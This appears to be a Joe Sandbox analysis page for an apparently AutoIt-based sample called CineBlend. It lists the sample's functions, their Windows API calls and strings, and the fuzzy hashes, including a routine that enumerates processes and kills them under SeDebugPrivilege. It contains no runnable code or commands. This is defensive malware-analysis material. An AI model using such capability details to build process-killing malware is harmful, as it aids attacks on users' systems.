Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: a48a0b63bd5459ef90c3523f5b31b1f4403be0f14bb7933d63ffc45b3656f656
Instruction ID: b5f41b46b1e1852aafee770f1db59231d71cca78a26c596970008e36d32ba314
Opcode Fuzzy Hash: a48a0b63bd5459ef90c3523f5b31b1f4403be0f14bb7933d63ffc45b3656f656
Instruction Fuzzy Hash: A001CDB9640344BFEB10AFA5DC4DF6B7BACEB88711F054425FA05EB2A1CA709800CB30

Function 00BBAB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00B9DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00B9DDAC
Part of subcall function 00B9DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00B9DDBA
Part of subcall function 00B9DD87: CloseHandle.KERNELBASE(00000000), ref: 00B9DE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BBABCA
GetLastError.KERNEL32 ref: 00BBABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BBAC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 00BBACC5
GetLastError.KERNEL32(00000000), ref: 00BBACD0
CloseHandle.KERNEL32(00000000), ref: 00BBAD21

Strings

SeDebugPrivilege, xrefs: 00BBABEC

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: cbeffe8ec416f36ca7c70ec361b63411ac4fd82eb8d853692d3d52b447a816cf
Instruction ID: 6bda350d3634a60335297d97f9ea5e6986cba11b407c3cae87cb5ebcbbb36498
Opcode Fuzzy Hash: cbeffe8ec416f36ca7c70ec361b63411ac4fd82eb8d853692d3d52b447a816cf
Instruction Fuzzy Hash: FD61BD74608641AFD320DF15C895F69BBE0EF44308F5884DCE4664BBA2CBB1EC45CB92

Function 00BC4322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00BC43C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00BC43D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BC43F0
_wcslen.LIBCMT ref: 00BC4435
SendMessageW.USER32(?,00001057,00000000,?), ref: 00BC4462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00BC4490

Strings

SysListView32, xrefs: 00BC4393

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 66a2946b89b2edffb1b786586357d1d327cee8b44ed6139dbacf38da64f8e23f
Instruction ID: ad5730e02b5abf3f261073f9a3988bc02d0f89917c632cd4ed3eba1be607e502
Opcode Fuzzy Hash: 66a2946b89b2edffb1b786586357d1d327cee8b44ed6139dbacf38da64f8e23f
Instruction Fuzzy Hash: A241C071900309ABDF219F64CC49FEA7BE9FB88350F1005AAF954E7291D7709D80CB90

Function 00B9C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B9C6C4
IsMenu.USER32(00000000), ref: 00B9C6E4
CreatePopupMenu.USER32 ref: 00B9C71A
GetMenuItemCount.USER32(00F15BA8), ref: 00B9C76B
InsertMenuItemW.USER32(00F15BA8,?,00000001,00000030), ref: 00B9C793

Strings

2, xrefs: 00B9C6FE
0, xrefs: 00B9C66F

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 83f743231c031bd5bf9f12cffd1a6e70c02aaec07f82b488e5eb31207a9c29d4
Instruction ID: cdb577580d63bbbd64acaf9bf16999437b80d67a1f4cff36b1841330feb2201d
Opcode Fuzzy Hash: 83f743231c031bd5bf9f12cffd1a6e70c02aaec07f82b488e5eb31207a9c29d4
Instruction Fuzzy Hash: 8C518A70600205ABDF11CFB8D8C4AAEBFF4EB59314F2442BAE91197291D7749D40CF61

Function 00B9D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00B9D1BE

Strings

stop, xrefs: 00B9D18F
info, xrefs: 00B9D15F
warning, xrefs: 00B9D1A7
blank, xrefs: 00B9D140
question, xrefs: 00B9D177

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 424361c8d5acfeca4da9df6f8a68155b0b97ac163838b5b7670e2cceab5b0099
Instruction ID: dcf8eec9286e0d390df8381dec90313721d5ec2a438fb8514237c3e6d72afdf2
Opcode Fuzzy Hash: 424361c8d5acfeca4da9df6f8a68155b0b97ac163838b5b7670e2cceab5b0099
Instruction Fuzzy Hash: 3F11B73729832ABAEB055F56DC82D6A77ECDF05765B2000FAFA00B61C1DBB45E444660

Function 00B9E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B9E759
gethostname.WSOCK32(?,00000100), ref: 00B9E773
gethostbyname.WSOCK32(?), ref: 00B9E780
inet_ntoa.WSOCK32(?), ref: 00B9E7C2
_strcat.LIBCMT ref: 00B9E7D0
WSACleanup.WSOCK32 ref: 00B9E7F5

Strings

0.0.0.0, xrefs: 00B9E79E

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 6a0f42d6163370f1602267298debd6b8cac99a198eed499b07e6af5100f199c0
Instruction ID: 51f74aab5c01a7e60c1dee7bb619f023531f645e14fe877f352aa8eb58274110
Opcode Fuzzy Hash: 6a0f42d6163370f1602267298debd6b8cac99a198eed499b07e6af5100f199c0
Instruction Fuzzy Hash: 3D11DF35900115BBCF20ABA0DC4AFEA77ECEF45711F1000F9F915A6091EF78CE858A61

Function 00B9F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00B9F641
_wcslen.LIBCMT ref: 00B9F652
_wcslen.LIBCMT ref: 00B9F690
_wcslen.LIBCMT ref: 00B9F6C6
_wcslen.LIBCMT ref: 00B9F6F6
_wcslen.LIBCMT ref: 00B9F706
_wcslen.LIBCMT ref: 00B9F742
_wcslen.LIBCMT ref: 00B9F771

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 5bb2bbd3f6a0758594b5d9526a23ea6270410833a3a9a1a148fc60cb13099f10
Instruction ID: 6777814dbd34bfcbfa066126a4ad38a18da4f6d53aa9f7388dea0ed02cd7dbd4
Opcode Fuzzy Hash: 5bb2bbd3f6a0758594b5d9526a23ea6270410833a3a9a1a148fc60cb13099f10
Instruction Fuzzy Hash: A9418165C10115A9DB11EBF88886BDFB7E8AF05311F5185F2E908E3121FB34D659C3A6

Function 00B4FBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00B739E2,00000004,00000000,00000000), ref: 00B4FC41
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00B739E2,00000004,00000000,00000000), ref: 00B8FC15
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00B739E2,00000004,00000000,00000000), ref: 00B8FC98

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: a9d2bff530477970167c795124df12473dd4455feb696aafcda3ed5b60fd1166
Instruction ID: abda9969b5177a32cb7af07870b4b2f98e740a8af0f171c335fefc0c1ef98de9
Opcode Fuzzy Hash: a9d2bff530477970167c795124df12473dd4455feb696aafcda3ed5b60fd1166
Instruction Fuzzy Hash: A141EB3060838A9ECB359B3CC9CCB797BD2EB4A350F1445BDE94647A72C631AA40EB11

Function 00BC379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00BC37B7
GetDC.USER32(00000000), ref: 00BC37BF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BC37CA
ReleaseDC.USER32(00000000,00000000), ref: 00BC37D6
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00BC3812
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BC3823
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00BC6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00BC385E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BC387D

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: af6a484e88bcd54923bebd136c36435c845a8a029219dc968777c6d934f7d175
Instruction ID: 81d7c2c8ae8d9acb3ab3bde1315812e71ebfcb28052b2b65ee1c7f414a458f4b
Opcode Fuzzy Hash: af6a484e88bcd54923bebd136c36435c845a8a029219dc968777c6d934f7d175
Instruction Fuzzy Hash: 55319C76201214BFEB118F54CC89FEB3BA9EF49711F044069FE089B291CAB59C41CBA0

Function 00BB5A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00BB5A64
NULL Pointer assignment, xrefs: 00BB5A8B, 00BB5DE0

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 8ec477ddfaf56e58a2acb3eb6913b97ca1f2988bbfa4563e1afef0e862c23412
Instruction ID: 9029c37f143331fa977c030213309183cf84eb763ad6bd8fd1f4f6314c3fe789
Opcode Fuzzy Hash: 8ec477ddfaf56e58a2acb3eb6913b97ca1f2988bbfa4563e1afef0e862c23412
Instruction Fuzzy Hash: 32D18C71A0060A9FDF20DF68C885FFEB7F5EB48304F1485A9E915AB290E7B0A945CB51

Function 00B718A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00B71B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00B7194E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00B71B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B719D1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00B71B7B,?,00B71B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B71A64
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00B71B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B71A7B

Part of subcall function 00B63B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B50165,?,?,00BA11D9,0000FFFF), ref: 00B63BC5

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00B71B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B71AF7
__freea.LIBCMT ref: 00B71B22
__freea.LIBCMT ref: 00B71B2E

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 7cdf02ff2a5abb82bb101eeead59f469ef54eabd3f2bad6c4ece1d3c390fa829
Instruction ID: e728f025dd22ac05a5aac100acb7c1f9c1a4a0077239b3c3308e3587bef71079
Opcode Fuzzy Hash: 7cdf02ff2a5abb82bb101eeead59f469ef54eabd3f2bad6c4ece1d3c390fa829
Instruction Fuzzy Hash: 2491C871E002169ADB208E6CCC91EEE7BF5DF49710F1989A9E929E7280E734DD46C770

Function 00BB4F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00BB50A5
VariantInit.OLEAUT32(?), ref: 00BB51A6
VariantClear.OLEAUT32(?), ref: 00BB51B0
VariantClear.OLEAUT32(?), ref: 00BB520D

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00BB5189
Null Object assignment in FOR..IN loop, xrefs: 00BB5035, 00BB5163, 00BB521B

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 2a5aed6883dfa0cddfa22a377e84ae6bea8bd56f806b3c103cd9a83f2aa37a1b
Instruction ID: bab9e96cc6683bee0f11d9f290b41c08c567a0e1d3153f7bee40d8a0190dd896
Opcode Fuzzy Hash: 2a5aed6883dfa0cddfa22a377e84ae6bea8bd56f806b3c103cd9a83f2aa37a1b
Instruction Fuzzy Hash: 06919C71A00619ABDF24DFA4CC84FEEBBF8EF49314F108599F505AB280D7B09945CBA1

Function 00BA1B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00BA1C1B
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00BA1C43
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00BA1C67
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00BA1C97
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00BA1D1E
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00BA1D83
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00BA1DEF

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: d3c4a461ecab44f23ad7600e58daee3ce2c5be37b0e8d8ab3e6d59ab52e4396d
Instruction ID: 2b1faeac1cf943f1b1a77ddb7fb0fcc9867b3e69c08206aaf4cb875f97ffa104
Opcode Fuzzy Hash: d3c4a461ecab44f23ad7600e58daee3ce2c5be37b0e8d8ab3e6d59ab52e4396d
Instruction Fuzzy Hash: 9D910375A04215AFDB40DF9CC885BBEB7F4FF06721F1488A9E951EB291E774A900CB50

Function 00B31D7E Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: a53f468c0abe49bb3e46d0100d85d64625246ddc9835bd9edfac2754b1dc7b15
Instruction ID: 98d1ec4759191f92e251057cbdc6ef4bec0e9f25c74209e93147d891cc881fa3
Opcode Fuzzy Hash: a53f468c0abe49bb3e46d0100d85d64625246ddc9835bd9edfac2754b1dc7b15
Instruction Fuzzy Hash: D1914A75D00219AFCB10CFA9CC84AEEBBF8FF49320F248599E915B7251D775AA41CB60

Function 00BB43A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00BB43C8
CharUpperBuffW.USER32(?,?), ref: 00BB44D7
_wcslen.LIBCMT ref: 00BB44E7
VariantClear.OLEAUT32(?), ref: 00BB467C

Part of subcall function 00BA169E: VariantInit.OLEAUT32(00000000), ref: 00BA16DE
Part of subcall function 00BA169E: VariantCopy.OLEAUT32(?,?), ref: 00BA16E7
Part of subcall function 00BA169E: VariantClear.OLEAUT32(?), ref: 00BA16F3

Strings

Incorrect Parameter format, xrefs: 00BB4403, 00BB45FE
AUTOIT.ERROR, xrefs: 00BB44DD, 00BB44E2

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: a505feb823a054f42a4ad81437e6a569648f1e72f79c51fbe350d5af3dee1b78
Instruction ID: 005e8f88a166f14840f1098c86de90718b4c4caefbdada00d1679bd745ee7473
Opcode Fuzzy Hash: a505feb823a054f42a4ad81437e6a569648f1e72f79c51fbe350d5af3dee1b78
Instruction Fuzzy Hash: 6A917C746087019FC714EF28C48096AB7E5FF89714F1489ADF88A97352DB71ED06CB92

Function 00BB560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00B908FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B90831,80070057,?,?,?,00B90C4E), ref: 00B9091B
Part of subcall function 00B908FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B90831,80070057,?,?), ref: 00B90936
Part of subcall function 00B908FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B90831,80070057,?,?), ref: 00B90944
Part of subcall function 00B908FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B90831,80070057,?), ref: 00B90954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00BB56AE
_wcslen.LIBCMT ref: 00BB57B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00BB582C
CoTaskMemFree.OLE32(?), ref: 00BB5837

Strings

NULL Pointer assignment, xrefs: 00BB5880, 00BB58AF

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 3e6e49ab88ccf90fe82b12a036cf4aeeaafb42809a6d047ee16084544c1f8dfb
Instruction ID: fe25997dd81305ad0dd72db5787a2af68f3a461f19c77a500b1c00a9f2c0003a
Opcode Fuzzy Hash: 3e6e49ab88ccf90fe82b12a036cf4aeeaafb42809a6d047ee16084544c1f8dfb
Instruction Fuzzy Hash: A491E575D00219EFDF20DFA4DC81EEEB7B9AF08314F1045A9E915A7251DB709A44CFA1

Function 00BC2B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00BC2C1F
GetMenuItemCount.USER32(00000000), ref: 00BC2C51
